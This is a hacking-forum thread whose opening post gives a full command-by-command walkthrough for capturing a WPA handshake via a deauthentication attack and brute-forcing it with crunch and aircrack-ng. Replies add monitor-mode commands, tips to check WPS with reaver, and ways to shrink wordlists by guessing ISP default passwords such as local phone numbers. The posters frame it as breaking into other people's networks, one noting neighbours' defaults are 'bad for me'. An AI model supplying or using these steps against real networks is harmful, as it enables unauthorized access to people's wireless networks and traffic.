WPA Cracking with Backtrack 5

[TRAiN3R]

Well I decided to do a quick write up of WPA cracking with Backtrack 5. The other day I was bored so I decided fuck it, why not? So I figured hell I'll make a guide while I'm at it.
 
1. Load up Backtrack (I was using Backtrack 5 R2)
2. Open up terminal
Type in:

Code: [Select]

airmon-ng start {WIRELESSADAPTER}What that will do is put your device in monitor mode on "mon0" (which will now become your new interface name)
3. In the terminal windows type in:

Code: [Select]

airodump-ng mon0Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.
4. Copy down the AP Mac, the Client Mac, and the channel number
After you've copied that you can close the other windows.
5. In a new terminal windows type in:

Code: [Select]

airodump-ng -w {CAPFILENAME} --bssid {APMAC} -c {APCHANNEL} mon0You can now use aireplay-ng to get the capture file, here's how we do it:

Code: [Select]

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.
Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)

Code: [Select]

/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txtIF YOU RUN THAT CRUNCH COMMAND, BE PREPARED ITS A 35.7GB FILE!
After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. for aircrack-ng run the following command:
 

Code: [Select]

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt
Just a quick run through. Its easy, but its the cracking that will take a while. Hope they have WPS, if they do, that becomes much easier There are also several wordlists available. You can use whatever wordlist you want. Also as long as you have the capture file, you can crack it on any system. You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]
 
Enjoy WPA cracking!
 
-TRAiN3R

[relax]

nice tutorial

i would check if the router has wps enabled with reaver first tho

[pyte]

Does this also also work with Backtrack 5R3?
im thinking of setting up an enviroment on vm ware.

[iTpHo3NiX]

Duh, its still aircrack-ng suite o.O

[pyte]

cool
im just a pure noob. expect staff like this from me...
 

[RedBullAddicted]

Hi,

if you have a specific network you want to break in I would recommend setting the monitor interface to the specific channel and I would not use airmon-ng for that task (had some problems in the past with it. For example your mon interface stays until next reboot). I would just use the linux commands to set my wifi card in monitor mode on a specific channel

Code: [Select]

ifconfig [wlancard e.g. wlan0] down
iwconfig [wlancard e.g. wlan0] mode managed
ifconfig [wlancard e.g. wlan0] up
iwconfig [wlancard e.g. wlan0] channel [channel e.g. 11]
ifconfig [wlancard e.g. wlan0] down
iwconfig [wlancard e.g. wlan0] mode monitor
ifconfig [wlancard e.g. wlan0] up

[Snayler]

Code: [Select]

ifconfig [wlancard e.g. wlan0] down
iwconfig [wlancard e.g. wlan0] mode managed
ifconfig [wlancard e.g. wlan0] up
iwconfig [wlancard e.g. wlan0] channel [channel e.g. 11]
ifconfig [wlancard e.g. wlan0] down
iwconfig [wlancard e.g. wlan0] mode monitor
ifconfig [wlancard e.g. wlan0] up

I always use that set of commands instead of airmon. I believe it's because airmon couldn't activate monitor mode if another process was using the network interface (like dhclient, etc...).

@OP: Don't take me the wrong way, but I think you should explain what each command does. Else every newbie who follows the tutorial will know how to perform the attack, but won't have the knowledge of how and why it works. Just my 2 cents.

[parad0x]

Nice Tut, +1.

[proxx]

Well I decided to do a quick write up of WPA cracking with Backtrack 5. The other day I was bored so I decided fuck it, why not? So I figured hell I'll make a guide while I'm at it.
 
1. Load up Backtrack (I was using Backtrack 5 R2)
2. Open up terminal
Type in:

Code: [Select]

airmon-ng start {WIRELESSADAPTER}What that will do is put your device in monitor mode on "mon0" (which will now become your new interface name)
3. In the terminal windows type in:

Code: [Select]

airodump-ng mon0Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.
4. Copy down the AP Mac, the Client Mac, and the channel number
After you've copied that you can close the other windows.
5. In a new terminal windows type in:

Code: [Select]

airodump-ng -w {CAPFILENAME} --bssid {APMAC} -c {APCHANNEL} mon0You can now use aireplay-ng to get the capture file, here's how we do it:

Code: [Select]

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.
Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)

Code: [Select]

/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txtIF YOU RUN THAT CRUNCH COMMAND, BE PREPARED ITS A 35.7GB FILE!
After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. for aircrack-ng run the following command:
 

Code: [Select]

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txt
Just a quick run through. Its easy, but its the cracking that will take a while. Hope they have WPS, if they do, that becomes much easier There are also several wordlists available. You can use whatever wordlist you want. Also as long as you have the capture file, you can crack it on any system. You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]
 
Enjoy WPA cracking!
 
-TRAiN3R

Bruteforcing WPA especially with only CPU is just plain retarted.
This will take months or even years to finish even with the latest CPU's on the market.
Even with very heavy GPU's bruteforcing could take a week or more.
The only viable attack would be a dictionary one.

[iTpHo3NiX]

Bruteforcing WPA especially with only CPU is just plain retarted.
This will take months or even years to finish even with the latest CPU's on the market.
Even with very heavy GPU's bruteforcing could take a week or more.
The only viable attack would be a dictionary one.

After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor.

Hrm as far as I know pyrit AND Elcomsoft Wireless Security Auditor both utilize GPU cores. And of course the bigger the dictionary, the longer it would take. Your words of circles make no sense.

Also TRAiN3R even hints at the fact that you will want a good system:

You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]

The only viable attack would be a dictionary one.

Bruteforcing with a wordlist is a dictionary attack smart one

[proxx]

Bruteforcing aka random characters is not viable for WPA and WPA2.
This cannot really be concidered a dictionary attack.
Thats what I was pointing out.
Even with a massive cloud this could take years.

So yeah thats what  I was saying.


Well on my laptop I can crack about 8000 PMK's.
Which is cute.
With some proper ATI cards X00.000 PMK's is not uncommon.
Some good dictionaries help out.
However where I live most people appear to just leave it at the default.
Which is bad for me.

[iTpHo3NiX]

Bruteforcing aka random characters is not viable for WPA and WPA2.
This cannot really be concidered a dictionary attack.
Thats what I was pointing out.
Even with a massive cloud this could take years.

So yeah thats what  I was saying.


Well on my laptop I can crack about 8000 PMK's.
Which is cute.
With some proper ATI cards X00.000 PMK's is not uncommon.
Some good dictionaries help out.
However where I live most people appear to just leave it at the default.
Which is bad for me.

Well the new default ISPs are using phone numbers now, so you can create a smaller wordlist using your area code then the other digits so they are much smaller files you can even narrow it down further as areas tend to use the same prefixes. And yes 10000+ can be common on good systems. Also a wordlist=dictionary

[proxx]

Well not where I live unfortunately.
Just pseaudo random generated strings.
However a certain very common ISP uses a random string of upper case letters which is 8 characters long.
26^8 is still nasty to crack and even with really good GPU's can take several weeks if not months.

[iTpHo3NiX]

Well not where I live unfortunately.
Just pseaudo random generated strings.
However a certain very common ISP uses a random string of upper case letters which is 8 characters long.
26^8 is still nasty to crack and even with really good GPU's can take several weeks if not months.

Very true. All the big ISPs in my area are using phone numbers which makes for a quick crack a passthrough with pyrit (or make an output file to use Elcomsoft on my Win machine)

Code: [Select]

/pentest/passwords/crunch/./crunch 10 10 000%%%%%%%

Where 000 is the area code. Although when I'm on my laptop and I know the prefix it would make an even smaller and quicker cracking process.